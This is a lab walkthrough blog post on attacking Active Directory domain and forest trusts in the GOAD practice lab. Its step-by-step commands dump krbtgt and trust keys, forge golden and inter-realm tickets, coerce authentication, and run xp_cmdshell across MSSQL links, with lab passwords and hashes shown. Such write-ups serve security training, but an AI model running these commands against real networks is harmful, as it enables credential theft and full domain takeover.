Home GOAD - part 12 - Trusts
Post
Cancel

GOAD - part 12 - Trusts

Posted Dec 21, 2022 Updated Mar 28, 2024
By mayfly
11 min read

On the previous post (Goad pwning part11) we tried some attacks path with ACL. This post will be on escalation with domain trust (from child to parent domain) and on Forest to Forest trust lateral move.

The forest trust exploitation as already been very well covered by harmjOy on this link, i recommend you to read :)

Goad upgrade

  • To simplify the trust exploitation in the lab i have done some small changes.

  • A new group DragonRider on sevenkingdoms.local

1

sudo docker run -ti --rm --network host -h goadansible -v $(pwd):/goad -w /goad/ansible goadansible ansible-playbook ad-data.yml -l dc01
  • Change groupe AcrossTheNarrowSea acl to add genericAll on dc01 (kingslanding)
1

sudo docker run -ti --rm --network host -h goadansible -v $(pwd):/goad -w /goad/ansible goadansible ansible-playbook ad-acl.yml -l dc01
  • Add builtin administrator user member on dc01 for dragonRider
1

sudo docker run -ti --rm --network host -h goadansible -v $(pwd):/goad -w /goad/ansible goadansible ansible-playbook ad-relations.yml -l dc01
  • Add sidhistory on the sevenkingdoms trust link to essos by default
1

sudo docker run -ti --rm --network host -h goadansible -v $(pwd):/goad -w /goad/ansible goadansible ansible-playbook vulnerabilities.yml -l dc01

The last one is to allow sid history and it is just like this command : trust_enable_sid_history_onkingslanding.png

Enumerate Trust

  • Let’s enumerate the trusts:
1
2

ldeep ldap -u tywin.lannister -p 'powerkingftw135' -d sevenkingdoms.local -s ldap://192.168.56.10 trusts
ldeep ldap -u tywin.lannister -p 'powerkingftw135' -d sevenkingdoms.local -s ldap://192.168.56.12 trusts

trusts_enum_ldeep.png

  • The sevenkingdoms to essos trust link is FOREST_TRANSITIVE | TREAT_AS_EXTERNAL due to Sid history enabled

  • The essos to sevenkingdoms trust link is just FOREST_TRANSITIVE

  • The corresponding ldap query is : (objectCategory=trustedDomain)

  • We can observe this with bloodhound too (button map domain trusts)
1

MATCH p=(n:Domain)-->(m:Domain) RETURN p

trusts_bh_enum.png

  • We can see
    • A domain bi-directional trust between north.sevenkingdoms.local and sevenkingdoms.local (Child / parent relation)
    • A forest bi-directional trust between essos.local and sevenkingdoms.local

Domain Trust - child/parent (north.sevenkingdoms.local -> sevenkingdoms.local)

  • Ok now imagine you have pwn the domain north.sevenkingdoms.local you have dump the ntds and you got all the NT hash of all the north domain users.

child_to_forest.png

As said by Microsoft the domain trust is not a security boundary

RaiseMeUp - Escalate with impacket raiseChild

  • To escalate from child to parent the simplest way is with impacket raiseChild.py script, this will do all the work for us.
1

raiseChild.py north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'

trusts_domain_raisechild.png

  • This create a golden ticket for the forest enterprise admin.
  • Log into the forest and get the target info (default administrator RID: 500)
  • All the job is done with one command, if you are lazy you don’t even need to understand x)

Golden ticket + ExtraSid

  • We have done the exploitation on one command with impacket raiseChild.py, now let’s just do the same but step by step and create the golden ticket.
  • Full explanation on the attack can be found here : https://adsecurity.org/?p=1640
  • First dump the krbtgt of the domain we own
1
2
3
4
5
6
7

# dump child ntds and get krbtgt NT hash
secretsdump -just-dc-user north/krbtgt \ 
 north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'@192.168.56.11

...
krbtgt:502:aa3b435b51404eeaad3b435b51404ee:13354bc6e1b48fff8d66a2090e909b27:::
..

trusts_child_dcsync_krbtgt.png

  • Now get the child and parent domain SID
1
2
3
4
5
6
7
8
9

# dump child domain SID 
lookupsid.py  -domain-sids north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'@192.168.56.11 0

[*] Domain SID is: S-1-5-21-638448100-4005671799-261795860

# dump parent domain SID 
lookupsid.py  -domain-sids north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'@192.168.56.10 0

[*] Domain SID is: S-1-5-21-1409754491-4246775990-3914137275

1
2
3
4
5

ticketer.py -nthash 13354bc6e1b48fff8d66a2090e909b27 \
 -domain-sid S-1-5-21-638448100-4005671799-261795860 \
 -domain north.sevenkingdoms.local \
 -extra-sid S-1-5-21-1409754491-4246775990-3914137275-519 \
 goldenuser
  • And we use the ticket to dump the parent domain NTDS
1
2

secretsdump -k -no-pass -just-dc-ntlm \
 north.sevenkingdoms.local/goldenuser@kingslanding.sevenkingdoms.local

trusts_child_extrasid_golden.png

Trust ticket - forge inter-realm TGT

  • Another way to escalate from child to parent is by extracting the trust key and use it to create our trust ticket (a very good explanation and examples with Mimikatz can be found here : https://adsecurity.org/?p=1588)

  • The trust key can be found by targeting the netbios name of the domain on the ntds

1
2

secretsdump -just-dc-user 'SEVENKINGDOMS$' \
 north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'@192.168.56.11

trusts_key.png

  • Now we got the trust key we can forge the ticket just like we done with the krbtgt user hash but this time we will set the spn : krbtgt/parent_domain
1
2
3
4
5

ticketer.py -nthash cef54bd576fc6054870d8d8cea5c069c \
 -domain-sid S-1-5-21-638448100-4005671799-261795860 \
 -domain north.sevenkingdoms.local \
 -extra-sid S-1-5-21-1409754491-4246775990-3914137275-519 \
 -spn krbtgt/sevenkingdoms.local trustfakeuser

trust_create_trust_ticket.png

  • Now we will use the forged TGT to ask a ST on the parent domain
1
2
3

export KRB5CCNAME=/workspace/trusts/trustfakeuser.ccache   
getST.py -k -no-pass -spn cifs/kingslanding.sevenkingdoms.local \
 sevenkingdoms.local/trustfakeuser@sevenkingdoms.local -debug

trust_trust_ticket_getst.png

  • And now we can use our service ticket :)
  • connect with smbclient
1
2

export KRB5CCNAME=/workspace/trusts/trustfakeuser@sevenkingdoms.local@cifs_kingslanding.sevenkingdoms.local@SEVENKINGDOMS.LOCAL.ccache
smbclient.py -k -no-pass trustfakeuser@kingslanding.sevenkingdoms.local

trust_trust_ticket_smbclient.png

  • or even dump secrets
1

secretsdump -k -no-pass -just-dc-ntlm trustfakeuser@kingslanding.sevenkingdoms.local

trust_trust_ticket_secretsdump.png

This technique is even working if krbtgt password as been changed 2 times !

Unconstrained delegation

  • As winterfell is a domain controler, by default it is configured with unconstrained delegation.
  • This attack from child to parent domain with Unconstrained delegation has been done in part 10 (delegations).
  • The principe is simple, coerce the parent dc to an unconstrained delegation server and extract the tgt.

Forest Trust (sevenkingdoms.local -> essos.local)

  • We have done Child to parent domain, in the next part we will try to exploit forest to forest.

forest_to_forest.png

Password reuse

  • On a real environment this is really accurate. Dump the ntds of the domain you own and try to find the same users on the external forest domains.
  • The lab didn’t have this behavior but it is really simple to exploit.

Foreign group and users

  • On bloodhound we can see very easily that there is link between the domains with the following query (Careful this query is fine in a lab but this will certainly be a little too heavy in a real world AD)
1

MATCH p = (a:Domain)-[:Contains*1..]->(x)-->(w)-->(z)<--(y)<-[:Contains*1..]-(b:Domain) where (x:Container or x:OU) and (y:Container or y:OU) and (a.name <>b.name) and (tolower(w.samaccountname) <> "enterprise admins" and tolower(w.samaccountname) <> "enterprise key admins" and tolower(z.samaccountname) <> "enterprise admins" and tolower(z.samaccountname) <> "enterprise key admins")  RETURN p

trust_bloodhound.png

  • On the GOAD lab you will find some specifics groups to pass from one domain to the other.

Note that bloodhound also have buttons to research foreign groups and users directly in the interface.

  • As you already have done the acl part previously you will easily find the way to exploit that. (shadow credentials/target kerberoasting/change password/…), but since it is cross domain we will do the first :)

  • Sevenkingdoms to essos : group spys

trust_foreing_groups_spys.png

  • To do that just pick a user from the small council (by example petyer.baelish:@littlefinger@) and exploit with the spy group
1
2

net rpc password jorah.mormont -U sevenkingdoms.local/petyer.baelish%@littlefinger@ -S meereen.essos.local
Enter new password for jorah.mormont: <here we enter P@ssword123>
  • And verify
1

cme smb 192.168.56.12 -u jorah.mormont -p 'P@ssword123' -d essos.local

trust_change_password_foreigngroup.png

  • We can also to that with shadow credentials (but the auto will not work here, we will have to do that with two steps)
1
2

certipy shadow add -u petyer.baelish@sevenkingdoms.local -p '@littlefinger@' \
 -dc-ip 192.168.56.12 -target meereen.essos.local -account 'jorah.mormont'

1

certipy auth -pfx jorah.mormont.pfx -username jorah.mormont -domain essos.local -dc-ip 192.168.56.12

trust_change_shadow_creds_cross_domain.png

  • Essos to sevenkingdoms : group accros_thenarrowsea

In the same way we can exploit the essos to sevenkingdoms foreign group

trust_foreing_groups_accros_thenarrowsea.png

Please not that the active directory groups are not all the same. There is 3 types of security groups: https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups

  • Universal
  • Global
  • Domain Local

If a group contains members of a trusted domain, it have to be of type Domain Local.

Groups scope informations are well explained by harmj0y here

Use unconstrained delegation

  • From kingslanding we can rule the essos domain with unconstrained delegation

  • We connect to kingslanding with rdp as an administrator

1

xfreerdp /d:sevenkingdoms.local /u:cersei.lannister /p:'il0vejaime' /v:192.168.56.10 /size:80%  /cert-ignore
  • For more simplicity we will disable defender
  • Now we launch rubeus.exe to wait for a TGT of the essos forest.
1

.\Rubeus.exe monitor /filteruser:MEEREEN$ /interval:1
  • And we run petitpotam on our linux console to force a coerce of meereen to kingslanding.
1

petitpotam.py -u arya.stark -p Needle -d north.sevenkingdoms.local kingslanding.sevenkingdoms.local meereen.essos.local
  • And we get the TGT of meereen !

trust_forest_tgt_unconstrained.png

  • Now we can copy it to linux (delete space and \n)
  • Decode the base64 and save it to a kirbi file
1

base64 -d rubeus.b64 > meereen.kirbi
  • Convert it to ccache and use it to dcsync essos.local
1
2
3

ticketConverter.py meereen.kirbi meereen.ccache 
export KRB5CCNAME=/workspace/trusts/unconstrained/meereen.ccache
secretsdump -k -no-pass -just-dc-ntlm essos.local/'MEEREEN$'@meereen.essos.local

trust_forest_tgt_unconstrained_finish.png

  • The MSSQL trust link is across forest, so it can be used to make forest to forest exploitation.

  • Example was done in part 7 but let’s redo this for fun :

  • Connect to the mssql DB as jon.snow
1

python3 mssqlclient.py -windows-auth north.sevenkingdoms.local/jon.snow:iknownothing@castelblack.north.sevenkingdoms.local
  • enumerate the mssql trusted links
1

enum_links

trust_forest_mssql_enum.png

  • And now use the link from castelblack (north domain) to braavos (essos domain)
1
2
3

use_link BRAAVOS
enable_xp_cmdshell
xp_cmdshell whoami
  • Because the link use sa as remote login on braavos we can enable cmd and launch command.

trust_forest_mssql_exec.png

Golden ticket with external forest, sid history ftw ( essos -> sevenkingdoms)

This attack can be done only because SID history is enabled on the sevenkingdoms->essos trust

  • Find the domain sid with lookupsid.py
    • essos SID : S-1-5-21-2203133648-1386395927-1390703624
    • sevenkingdoms SID: S-1-5-21-1409754491-4246775990-3914137275
  • Like before extract the krbtgt hash
1
2
3
4
5
6
7

secretsdump -just-dc-user 'essos/krbtgt' essos.local/daenerys.targaryen:'BurnThemAll!'@192.168.56.12
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e58cf01ba6cc645da9f7ab1f28fc3934:::
...

About sid filtering dirkjanm say on his blog : “What this does mean for an attacker is that you can spoof any RID >1000 group if SID history is enabled across a Forest trust!”

  • The group dragonrider is a perfect match (on a real audit exchange groups are usualy a good target)

trust_dragonrider.png

  • Create the golden ticket for a fake user
1
2
3
4
5

ticketer.py -nthash e58cf01ba6cc645da9f7ab1f28fc3934 \
-domain-sid S-1-5-21-2203133648-1386395927-1390703624 \
-domain essos.local \
-extra-sid S-1-5-21-1409754491-4246775990-3914137275-1132 \
dragon
  • And use it (secretsdump will work too)
1
2

export KRB5CCNAME=/workspace/trusts/external/dragon.ccache
smbexec.py -k -no-pass dragon@kingslanding.sevenkingdoms.local -debug

trust_external_golden_exploit.png

Trust ticket with external forest ( essos -> sevenkingdoms)

  • Excatly like we done before on domain forest we can do this on external forest but just like with the golden ticket we need the sid history enabled to exploit.

  • Find the domain sid with lookupsid.py

    • essos SID : S-1-5-21-2203133648-1386395927-1390703624
    • sevenkingdoms SID: S-1-5-21-1409754491-4246775990-3914137275
1
2
3
4
5
6
7

secretsdump -just-dc-user 'SEVENKINGDOMS$' essos.local/daenerys.targaryen:'BurnThemAll!'@192.168.56.12
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:285b80ddc1ad529f27403804e75a9ab1:::
...
  • Create the inter-realm tgt ticket
1
2
3
4
5

ticketer.py -nthash 285b80ddc1ad529f27403804e75a9ab1 \
 -domain-sid S-1-5-21-2203133648-1386395927-1390703624 \
 -domain essos.local \
 -extra-sid S-1-5-21-1409754491-4246775990-3914137275-1132 \
 -spn krbtgt/sevenkingdoms.local trustdragon

trust_external_trustticket1.png

  • Ask a service ticket for kingslanding cifs
1
2
3

export KRB5CCNAME=/workspace/trusts/external/trustdragon.ccache
getST.py -k -no-pass -spn cifs/kingslanding.sevenkingdoms.local \
 sevenkingdoms.local/trustdragon@sevenkingdoms.local -debug

trust_external_trustticket2.png

  • And enjoy (secretsdump will work too)
1
2

export KRB5CCNAME=/workspace/trusts/external/trustdragon@sevenkingdoms.local.ccache
smbexec.py -k -no-pass trustdragon@kingslanding.sevenkingdoms.local -debug

trust_external_trustticket3.png

Exploit acl with external trust golden ticket

  • Ok now imagine we want to exploit this acl from essos:

trust_external_acl.png

By now i didn’t found a nice way to do this from linux, but from windows it is pretty easy

  • Connect as administrator on meereen, disable the antivrius to be able to use mimikatz and powerview
  • Create the golden ticket with mimikatz matching the group kingsguard (RID 1130)
1

mimikatz # kerberos::golden /user:guard /domain:essos.local /sid:S-1-5-21-2203133648-1386395927-1390703624 /krbtgt:e58cf01ba6cc645da9f7ab1f28fc3934 /sids:S-1-5-21-1409754491-4246775990-3914137275-1130 /ptt

trust_acl_mimi.png

trust_acl_golentgt.png

  • And now use powerview to change stannis password
1
2
3

Import-Module .\powerview.ps1
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity stannis.baratheon -AccountPassword $SecPassword -Domain sevenkingdoms.local

trust_acl_changepassword.png

  • And it work !

trust_acl_changepassword_cme.png

  • And if we look at the created tickets with klist:
    • Server: krbtgt/essos.local @ essos.local (golden ticket)
    • Server: krbtgt/SEVENKINGDOMS.LOCAL @ ESSOS.LOCAL (kdc: meereen) (tgt inter realm)
    • Server: ldap/kingslanding.sevenkingdoms.local @ SEVENKINGDOMS.LOCAL (kdc: kingslanding)
    • Server: ldap/kingslanding.sevenkingdoms.local/sevenkingdoms.local @ SEVENKINGDOMS.LOCAL (kdc: kingslanding)

The end - Winter is coming

  • The GOAD’s writeups series end with this part. If you read all you are very brave and i hope you enjoyed it despite my terrible english ^^
  • I also hope you gived a try to the lab and all is working fine on your computer.
  • For the next year i have other evolution of the lab, blog post ideas and projects in mind, you will see it on twitter (@M4yFly) when something new will come.
  • Again thank you to all the security researchers and opensource contributors for all the work and share they do !

Resources

AD, GOAD
AD, Lab
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents